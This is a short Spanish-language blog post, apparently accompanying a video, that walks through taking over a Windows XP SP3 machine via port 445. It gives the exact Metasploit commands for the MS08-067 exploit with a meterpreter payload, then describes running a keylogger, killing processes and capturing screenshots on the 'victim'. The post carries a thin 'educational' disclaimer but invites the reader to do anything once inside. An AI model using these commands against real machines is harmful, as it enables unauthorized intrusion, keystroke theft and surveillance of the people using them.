Por esto es bueno tener siempre tu equipo actualizado, con antivirus, firewalls y mejor aún... Que no sea Windows xD al menos para dificultar un poco las cosas....
Esto es con fines educativos, el uso que se le de depende de cada persona u.u La computadora con la que hice el videotutorial es mía (aunque la está usando mi hermano) así que no he hecho nada malo u.u
¿Qué se va a hacer?
- Obtener un shell de una máquina Windows XP con Service Pack 3 explotando el puerto 445
- Iniciar un keylogger en la máquina víctima.
- Ver procesos ejecutándose y cómo matarlos
- Tomar capturas de pantalla de la víctima
- Lo demás está en tu imaginación.... Puedes hacer lo que quieras, ya estás en la máquina víctima!! XD
¿Qué se necesita?
Una víctima =P, (ruby y rubygems requisito para Metasploit) y Metasploit
Comandos usados (para llegar al shell) en el videotutorial
# cd /opt/framework.../msf3
# ./msfconsole
> use exploit/windows/smb/ms08_067_netapi
>show options
>set rhost IP
>set payload windows/meterpreter/bind_tcp
>show options
>exploit
Ah y por cierto... una disculpa por la mala calidad... no supe usar mis editores de vídeo xD
Vídeo (ver en pantalla completa para mejor visibilidad de las letras):
No hay comentarios:
Publicar un comentario